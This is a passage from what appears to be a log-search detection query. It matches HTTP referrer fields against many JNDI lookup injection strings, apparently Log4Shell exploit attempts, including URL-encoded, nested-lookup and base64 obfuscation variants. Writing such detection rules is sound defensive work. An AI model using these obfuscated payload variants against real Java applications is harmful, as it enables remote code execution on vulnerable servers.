OR *%2F%252524%25257Bjndi%3A* OR *$\{jndi\:$\{lower\:* OR *$\{\:\:\-j\}$\{* OR *$\{jndi\:nis* OR *$\{jndi\:nds* OR *$\{jndi\:corba* OR *$\{jndi\:iiop* OR *$\{$\{env\:BARFOO\:\-j\}* OR *$\{\:\:\-l\}$\{\:\:\-d\}$\{\:\:\-a\}$\{\:\:\-p\}* OR *$\{base64\:JHtqbmRp*) AND http.request.referrer:(*$\{jndi\:ldap\:\/* OR *$\{jndi\:rmi\:\/* OR *$\{jndi\:ldaps\:\/* OR *$\{jndi\:dns\:\/* OR *\/$%7bjndi\:* OR *%24%7bjndi\:* OR *$%7Bjndi\:* OR *%2524%257Bjndi* OR *%2F%252524%25257Bjndi%3A* OR *$\{jndi\:$\{lower\:* OR *$\{\:\:\-j\}$\{* OR *$\{jndi\:nis* OR *$\{jndi\:nds* OR *$\{jndi\:corba* OR *$\{jndi\:iiop* OR *$\{$\{env\:BARFOO\:\-j\}* OR *$\{\:\:\-l\}$\{\:\:\-d\}$\{\:\:\-a\}$\{\:\:\-p\}* OR *$\{base64\:JHtqbmRp*))